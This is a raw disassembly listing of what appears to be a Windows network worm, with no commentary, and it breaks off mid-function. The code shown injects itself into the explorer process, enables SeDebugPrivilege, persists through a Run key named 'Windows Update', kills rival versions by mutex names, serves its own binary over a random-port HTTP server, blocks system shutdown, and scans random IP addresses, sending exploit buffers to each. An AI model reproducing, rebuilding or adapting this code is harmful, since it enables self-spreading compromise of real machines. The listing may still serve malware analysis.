cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0DEh
push offset dword_309046B8
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp eax, 46h
jl loc_30901D1D
cmp [ebp+var_730], 31h
jnz loc_30901BC8
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
push offset byte_309042B8
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902CB2 ; memcpy
mov eax, dword_30904BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A69: ; CODE XREF: sub_309017D2+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 68h
push offset dword_309047FC
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A0h
push offset dword_30904868
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp [ebp+arg_0], 0
jz loc_30901CB8
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A20
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902CB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904A8C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902CB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B00
push eax
call sub_30902CB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901D10
; ---------------------------------------------------------------------------
loc_30901BC8: ; CODE XREF: sub_309017D2+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902CA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904C70
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
add esp, 40h
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C64: ; CODE XREF: sub_309017D2+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C64
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902CA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902CA6 ; memset
add esp, 18h
jmp loc_30901A69
; ---------------------------------------------------------------------------
loc_30901CB8: ; CODE XREF: sub_309017D2+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3090490C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902CB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3090498C
push eax
call sub_30902CB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901D10: ; CODE XREF: sub_309017D2+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
and [ebp+var_C], 0
loc_30901D1D: ; CODE XREF: sub_309017D2+1AD�j
; sub_309017D2+1E1�j ...
push 2
push [ebp+var_4]
call dword_30901170 ; shutdown
loc_30901D28: ; CODE XREF: sub_309017D2+166�j
push [ebp+var_4]
call dword_30901174 ; closesocket
pop esi
loc_30901D32: ; CODE XREF: sub_309017D2+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D39 proc near ; CODE XREF: UPX0:loc_30902347�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A8 ; LoadLibraryA
mov esi, dword_309010A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_309010A4
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DBD
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_309010A4
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DBD
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_309010A4
mov esi, eax
test esi, esi
jz short loc_30901DBD
lea eax, [ebp+var_C]
push eax
push 20h
call dword_309010A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DBD: ; CODE XREF: sub_30901D39+28�j
; sub_30901D39+37�j ...
pop edi
pop esi
leave
retn
sub_30901D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DC1 proc near ; CODE XREF: UPX0:3090235B�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30904FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B4 ; GetModuleHandleA
mov esi, dword_309010A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_309010A4
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901E08
loc_30901E04: ; CODE XREF: sub_30901DC1+54�j
push 1
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E08: ; CODE XREF: sub_30901DC1+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_309010A4
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901E04
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_30901110 ; FindWindowA
test eax, eax
jnz short loc_30901E36
call dword_30901114 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E36
push 2
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E36: ; CODE XREF: sub_30901DC1+65�j
; sub_30901DC1+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E5C
push 3
loc_30901E59: ; CODE XREF: sub_30901DC1+45�j
; sub_30901DC1+73�j
pop eax
jmp short loc_30901EC7
; ---------------------------------------------------------------------------
loc_30901E5C: ; CODE XREF: sub_30901DC1+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EBA
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010AC ; WriteProcessMemory
push dword_30904FC4
call esi ; dword_3090107C
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901EA6
push eax
call esi ; dword_3090107C
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EA6: ; CODE XREF: sub_30901DC1+DE�j
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EBA: ; CODE XREF: sub_30901DC1+B2�j
mov [ebp+var_4], 4
loc_30901EC1: ; CODE XREF: sub_30901DC1+E3�j
; sub_30901DC1+F7�j
push ebx
call esi ; dword_3090107C
mov eax, [ebp+var_4]
loc_30901EC7: ; CODE XREF: sub_30901DC1+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901ECC proc near ; CODE XREF: sub_30902195+B�p
; UPX0:3090231D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901ECC endp
; =============== S U B R O U T I N E =======================================
sub_30901EFA proc near ; CODE XREF: sub_30901DC1+EA�p
; UPX0:30902327�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010BC ; CreateMutexA
retn
sub_30901EFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F09 proc near ; CODE XREF: sub_30902383+15B�p
; sub_30902383+166�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
pop ebp
retn
sub_30901F09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F23 proc near ; CODE XREF: sub_30902195+12C�p
; sub_3090259A+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F23 endp
; =============== S U B R O U T I N E =======================================
sub_30901F44 proc near ; CODE XREF: sub_309011A0+68�p
; sub_30902A6B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F6C
loc_30901F55: ; CODE XREF: sub_30901F44+26�j
call dword_309010FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F55
loc_30901F6C: ; CODE XREF: sub_30901F44+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F74 proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902CA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; dword_3090107C
push [ebp+var_10]
call esi ; dword_3090107C
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FCA proc near ; CODE XREF: sub_30902622+3E�p
; sub_309026E9+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3090114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FEB
call dword_30901150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FEB: ; CODE XREF: sub_30901FCA+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901154 ; gethostbyname
test eax, eax
jnz short loc_30902000
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30902000: ; CODE XREF: sub_30901FCA+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FCA endp
; =============== S U B R O U T I N E =======================================
sub_30902009 proc near ; CODE XREF: sub_30902536+22�p
; sub_3090259A+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_30901130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30902009 endp
; =============== S U B R O U T I N E =======================================
sub_3090201F proc near ; CODE XREF: sub_30902383+40�p
; sub_30902383+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010CC ; OpenEventA
test eax, eax
jz short locret_30902038
push eax
call dword_309010C8 ; SetEvent
locret_30902038: ; CODE XREF: sub_3090201F+10�j
retn
sub_3090201F endp
; =============== S U B R O U T I N E =======================================
sub_30902039 proc near ; CODE XREF: sub_3090169C+30�p
push esi
mov esi, dword_309010FC
push edi
call esi ; dword_309010FC
mov edi, eax
shl edi, 10h
call esi ; dword_309010FC
or eax, edi
pop edi
pop esi
retn
sub_30902039 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090204F proc near ; DATA XREF: sub_30902195+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902080
push 1
jmp loc_3090213B
; ---------------------------------------------------------------------------
loc_30902080: ; CODE XREF: sub_3090204F+28�j
mov esi, dword_30901104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_30901104
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
lea eax, [ebp+var_100]
push offset dword_309041F0
push eax
call esi ; dword_30901104
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
mov esi, dword_30901168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_30901168
push dword_30904FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902CAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_30901168
loc_309020FD: ; CODE XREF: sub_3090204F+E8�j
mov eax, dword_30904FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3090210F
mov eax, ecx
loc_3090210F: ; CODE XREF: sub_3090204F+BC�j
test eax, eax
jz short loc_3090213E
push 0
push eax
mov eax, dword_30904FB8
add eax, edi
push eax
push ebx
call esi ; dword_30901168
cmp eax, 0FFFFFFFFh
jz short loc_30902139
cmp eax, 1000h
jb short loc_3090213E
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020FD
; ---------------------------------------------------------------------------
loc_30902139: ; CODE XREF: sub_3090204F+D5�j
push 2
loc_3090213B: ; CODE XREF: sub_3090204F+2C�j
pop eax
jmp short loc_3090218E
; ---------------------------------------------------------------------------
loc_3090213E: ; CODE XREF: sub_3090204F+C2�j
; sub_3090204F+DC�j
push offset dword_30904FBC
call dword_309010D4 ; InterlockedIncrement
jmp short loc_30902169
; ---------------------------------------------------------------------------
loc_3090214B: ; CODE XREF: sub_3090204F+49�j
; sub_3090204F+61�j
mov esi, dword_30901168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_30901168
push 0
push 3
push offset dword_30904D38
push ebx
call esi ; dword_30901168
loc_30902169: ; CODE XREF: sub_3090204F+FA�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_30901170 ; shutdown
push ebx
call dword_30901174 ; closesocket
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
loc_3090218E: ; CODE XREF: sub_3090204F+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090204F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902195 proc near ; DATA XREF: sub_30902383+156�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901ECC
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_30904FBC, ebx
call sub_30902859
add esp, 14h
test eax, eax
jnz loc_309022CA
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_30902201
push 1
call dword_309010D0 ; ExitThread
loc_30902201: ; CODE XREF: sub_30902195+62�j
push ebx
push esi
call dword_309010DC ; GetFileSize
push eax
mov dword_30904FC0, eax
call sub_30902C75
pop ecx
mov dword_30904FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30904FC0
push eax
push esi
call dword_309010D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30904FC0, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_30902263: ; CODE XREF: sub_30902195+E5�j
; sub_30902195+ED�j ...
call dword_309010FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_30904FCC, eax
jz short loc_30902263
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_30902263
push eax
call dword_30901160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_30901140 ; bind
test eax, eax
jnz short loc_30902263
push 64h
push edi
call dword_30901144 ; listen
mov [ebp+var_8], esi
pop esi
loc_309022AC: ; CODE XREF: sub_30902195+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901148 ; accept
push eax
push offset sub_3090204F
call sub_30901F23
pop ecx
pop ecx
jmp short loc_309022AC
; ---------------------------------------------------------------------------
loc_309022CA: ; CODE XREF: sub_30902195+3D�j
push ebx
call dword_309010D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_30902195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022D9 proc near ; CODE XREF: sub_30902383:loc_309024D3�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3090113C
push eax
push 2
call esi ; dword_3090113C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3090113C
pop esi
leave
retn
sub_309022D9 endp
; ---------------------------------------------------------------------------
loc_30902305: ; CODE XREF: UPX1:30906C68�j
push 0
call dword_309010B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30904FD0, eax
call dword_30901074 ; DeleteFileA
call sub_30901ECC
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
call dword_309010E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_30902347
push 1
call dword_309010E0 ; ExitProcess
loc_30902347: ; CODE XREF: UPX0:3090233D�j
call sub_30901D39
call sub_309029BD
call sub_30902B37
push offset sub_30902383
call sub_30901DC1
test eax, eax
pop ecx
jz short loc_3090236C
push 0
call sub_30902383
loc_3090236C: ; CODE XREF: UPX0:30902363�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3090236F proc near ; CODE XREF: sub_30902383:loc_309024FC�p
; sub_30902536:loc_3090254F�p ...
push 0
push dword_30904FC8
call dword_30901070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3090236F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902383 proc near ; CODE XREF: UPX0:30902367�p
; DATA XREF: UPX0:30902356�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901190
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU17x ; "u17x"
xor edi, edi
push edi
push 1
push edi
call dword_3090106C ; CreateEventA
mov dword_30904FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU14x ; "u14x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU15x ; "u15x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU16x ; "u16x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13i ; "u13i"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU15 ; "u15"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU16 ; "u16"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU17 ; "u17"
call sub_30901EFA
pop ecx
cmp [ebp+arg_0], edi
jz short loc_309024D3
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A8
call esi ; dword_309010A8
push offset aWininet ; "wininet"
call esi ; dword_309010A8
push offset aMsvcrt ; "msvcrt"
call esi ; dword_309010A8
push offset aAdvapi32 ; "advapi32"
call esi ; dword_309010A8
push offset aUser32 ; "user32"
call esi ; dword_309010A8
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
loc_309024D3: ; CODE XREF: sub_30902383+115�j
call sub_309022D9
push edi
push offset sub_30902195
call sub_30901F09
push edi
push offset sub_3090169C
call sub_30901F09
push edi
push offset loc_30902745
call sub_30901F09
add esp, 18h
loc_309024FC: ; CODE XREF: sub_30902383+194�j
call sub_3090236F
test eax, eax
jnz short loc_30902519
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_309024FC
; ---------------------------------------------------------------------------
loc_30902519: ; CODE XREF: sub_30902383+180�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902383 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902536 proc near ; DATA XREF: sub_3090259A+55�o
; sub_30902622+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_30902545
push 1
pop eax
jmp short locret_30902596
; ---------------------------------------------------------------------------
loc_30902545: ; CODE XREF: sub_30902536+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_3090254F: ; CODE XREF: sub_30902536+5A�j
call sub_3090236F
test eax, eax
jnz short loc_30902592
call sub_30902009
test eax, eax
jz short loc_30902592
cmp [ebp+var_1], bl
jz short loc_3090258B
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017D2
movzx esi, word_30904FDC
pop ecx
call dword_309010FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_3090258B: ; CODE XREF: sub_30902536+2E�j
inc bl
cmp bl, 0FFh
jb short loc_3090254F
loc_30902592: ; CODE XREF: sub_30902536+20�j
; sub_30902536+29�j
pop esi
xor eax, eax
pop ebx
locret_30902596: ; CODE XREF: sub_30902536+D�j
leave
retn 4
sub_30902536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090259A proc near ; DATA XREF: sub_30902622+7E�o
; UPX0:309027DA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_309025A8
push 1
pop eax
jmp short loc_3090261E
; ---------------------------------------------------------------------------
loc_309025A8: ; CODE XREF: sub_3090259A+7�j
push ebx
push esi
push edi
call sub_30901ECC
mov esi, dword_309010FC
xor ebx, ebx
loc_309025B8: ; CODE XREF: sub_3090259A+7D�j
call sub_3090236F
test eax, eax
jnz short loc_30902619
call sub_30902009
test eax, eax
jz short loc_30902619
call esi ; dword_309010FC
mov byte ptr [ebp+arg_0+2], al
call esi ; dword_309010FC
push offset dword_30904FD4
mov byte ptr [ebp+arg_0+3], al
call dword_309010D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309025FB
push [ebp+arg_0]
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309025FB: ; CODE XREF: sub_3090259A+50�j
movzx edi, word_30904FDC
call esi ; dword_309010FC
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_309025B8
loc_30902619: ; CODE XREF: sub_3090259A+25�j
; sub_3090259A+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_3090261E: ; CODE XREF: sub_3090259A+C�j
pop ebp
retn 4
sub_3090259A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902622 proc near ; DATA XREF: UPX0:309027F2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901ECC
call sub_3090236F
test eax, eax
jnz loc_309026DB
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010FC
push edi
loc_30902648: ; CODE XREF: sub_30902622+48�j
; sub_30902622+B0�j
call esi ; dword_309010FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_309010FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_309010FC
mov byte ptr [ebp+var_4+2], al
loc_30902657: ; CODE XREF: sub_30902622+3C�j
call esi ; dword_309010FC
cmp al, 7Fh
